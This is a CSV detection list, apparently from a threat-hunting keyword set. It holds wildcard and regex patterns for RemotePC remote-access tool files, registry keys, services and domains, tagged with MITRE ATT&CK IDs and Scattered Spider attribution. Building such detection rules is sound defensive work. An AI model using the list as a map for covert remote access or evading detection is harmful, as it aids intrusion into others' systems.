"*\RemotePCViewer.msi*",".{0,1000}\\RemotePCViewer\.msi.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RpcAccessPermissionNotifier.exe*",".{0,1000}\\RpcAccessPermissionNotifier\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RpcAccessPermissionNotifier.exe*",".{0,1000}\\RpcAccessPermissionNotifier\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RpcApp\RPCCodecEngine.exe*",".{0,1000}\\RpcApp\\RPCCodecEngine\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RpcApp\Tools\Chat.exe*",".{0,1000}\\RpcApp\\Tools\\Chat\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RpcApp\Tools\Chat.exe*",".{0,1000}\\RpcApp\\Tools\\Chat\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RpcApp\Tools\TransferServer.exe*",".{0,1000}\\RpcApp\\Tools\\TransferServer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCAppLauncherLogFile.txt*",".{0,1000}\\RPCAppLauncherLogFile\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCAttended.log*",".{0,1000}\\RPCAttended\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCAttendedAdmin.exe*",".{0,1000}\\RPCAttendedAdmin\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCCertificate.log*",".{0,1000}\\RPCCertificate\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCCertificate.log*",".{0,1000}\\RPCCertificate\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCClipboard.exe*",".{0,1000}\\RPCClipboard\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCClipboardAttended.exe*",".{0,1000}\\RPCClipboardAttended\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCConfig.ini*",".{0,1000}\\RPCConfig\.ini.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCCoreViewer.exe*",".{0,1000}\\RPCCoreViewer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCCoreViewerL.exe*",".{0,1000}\\RPCCoreViewerL\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RpcDND_Console.exe*",".{0,1000}\\RpcDND_Console\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RpcDND_Console.exe*",".{0,1000}\\RpcDND_Console\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCDownloader.exe*",".{0,1000}\\RPCDownloader\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\rpcdownloader.exe*",".{0,1000}\\rpcdownloader\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCDownloaderLogFile.txt*",".{0,1000}\\RPCDownloaderLogFile\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCDownloaderLogFile.txt*",".{0,1000}\\RPCDownloaderLogFile\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCDragDrop.txt*",".{0,1000}\\RPCDragDrop\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCFirewallAttended.exe*",".{0,1000}\\RPCFirewallAttended\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCFireWallRule.exe*",".{0,1000}\\RPCFireWallRule\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCFireWallRule.exe*",".{0,1000}\\RPCFireWallRule\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCFireWallRulelogfile.txt*",".{0,1000}\\RPCFireWallRulelogfile\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCKeyMouseHandler.txt*",".{0,1000}\\RPCKeyMouseHandler\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCOTABootstrapper.exe*",".{0,1000}\\RPCOTABootstrapper\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCOTADesktop.exe*",".{0,1000}\\RPCOTADesktop\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCOTADesktopUAC.exe*",".{0,1000}\\RPCOTADesktopUAC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RpcOTADND_Console.exe*",".{0,1000}\\RpcOTADND_Console\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCOTAElevator.exe*",".{0,1000}\\RPCOTAElevator\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCOTAFTHost.exe*",".{0,1000}\\RPCOTAFTHost\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCOTAKillService.exe*",".{0,1000}\\RPCOTAKillService\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCOTARelauncher.exe*",".{0,1000}\\RPCOTARelauncher\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCOTAService.exe*",".{0,1000}\\RPCOTAService\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCOTAServiceUAC.exe*",".{0,1000}\\RPCOTAServiceUAC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCOTAUtilityHost.exe*",".{0,1000}\\RPCOTAUtilityHost\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCOTAViewerHostKeyPopup.exe*",".{0,1000}\\RPCOTAViewerHostKeyPopup\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCPerformanceService.exe*",".{0,1000}\\RPCPerformanceService\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCPerformanceService.log*",".{0,1000}\\RPCPerformanceService\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCPerformanceService.log*",".{0,1000}\\RPCPerformanceService\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCPerfViewer.exe*",".{0,1000}\\RPCPerfViewer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\rpcperfviewer.exe*",".{0,1000}\\rpcperfviewer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCPerfViewer.log*",".{0,1000}\\RPCPerfViewer\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCPing.txt*",".{0,1000}\\RPCPing\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCPreUninstall.log*",".{0,1000}\\RPCPreUninstall\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCPreUninstall.log*",".{0,1000}\\RPCPreUninstall\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCPrinterDownloader.exe*",".{0,1000}\\RPCPrinterDownloader\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCPrinterDownloader.txt*",".{0,1000}\\RPCPrinterDownloader\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCPrinterDownloader.txt*",".{0,1000}\\RPCPrinterDownloader\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCProxyLatency.exe*",".{0,1000}\\RPCProxyLatency\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCProxyLatency.exe*",".{0,1000}\\RPCProxyLatency\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCProxyLatencyAttended.exe*",".{0,1000}\\RPCProxyLatencyAttended\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCSettings.ini*",".{0,1000}\\RPCSettings\.ini.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCSettings.ini*",".{0,1000}\\RPCSettings\.ini.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RpcStickyNotes.exe*",".{0,1000}\\RpcStickyNotes\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCSuite_*_Inc.log*",".{0,1000}\\RPCSuite_.{0,1000}_Inc\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RPCsuiteLaunch.txt*",".{0,1000}\\RPCsuiteLaunch\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Schedule\TaskCache\Tree\RemotePC*",".{0,1000}\\Schedule\\TaskCache\\Tree\\RemotePC.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\Services\RemotePCAttendedService*",".{0,1000}\\Services\\RemotePCAttendedService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Tools\Ninja.WebSockets.dll*",".{0,1000}\\Tools\\Ninja\.WebSockets\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Tracing\RemotePCLauncher_*",".{0,1000}\\Tracing\\RemotePCLauncher_.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\Tracing\RemotePCUIU*",".{0,1000}\\Tracing\\RemotePCUIU.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\TransferClient.exe.config*",".{0,1000}\\TransferClient\.exe\.config.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\TransferServer.exe.config*",".{0,1000}\\TransferServer\.exe\.config.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ViewerHostKeyPopup.exe*",".{0,1000}\\ViewerHostKeyPopup\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\viewerhostkeypopup.exe*",".{0,1000}\\viewerhostkeypopup\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ViewerHostKeyPopup.exe*",".{0,1000}\\ViewerHostKeyPopup\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\WOW6432Node\RemotePC*",".{0,1000}\\WOW6432Node\\RemotePC.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*AppData\Local\Temp\RemotePC Attended*",".{0,1000}AppData\\Local\\Temp\\RemotePC\sAttended.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*download.remotepc.com*",".{0,1000}download\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*download.remotepc.com*",".{0,1000}download\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","network","10","10","N/A","N/A","N/A","N/A"
"*HKCR\REMOTEPC*",".{0,1000}HKCR\\REMOTEPC.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*https://login.remotepc.com/rpcnew*",".{0,1000}https\:\/\/login\.remotepc\.com\/rpcnew.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ip.remotepc.com*",".{0,1000}ip\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","network","10","10","N/A","N/A","N/A","N/A"
"*login.remotepc.com*",".{0,1000}login\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","network","10","10","N/A","N/A","N/A","N/A"
"*net start RPCPerformanceService*",".{0,1000}net\sstart\sRPCPerformanceService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*program files (x86)\remotepc\*",".{0,1000}program\sfiles\s\(x86\)\\remotepc\\.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ProgramData\RemotePC Performance*",".{0,1000}ProgramData\\RemotePC\sPerformance.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ProgramData\RemotePC*",".{0,1000}ProgramData\\RemotePC.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePC (1).exe*",".{0,1000}RemotePC\s\(1\)\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePC Performance Printer.url*",".{0,1000}RemotePC\sPerformance\sPrinter\.url.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemotePC* - A new computer has been added to your account*",".{0,1000}RemotePC.{0,1000}\s\-\sA\snew\scomputer\shas\sbeen\sadded\sto\syour\saccount.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
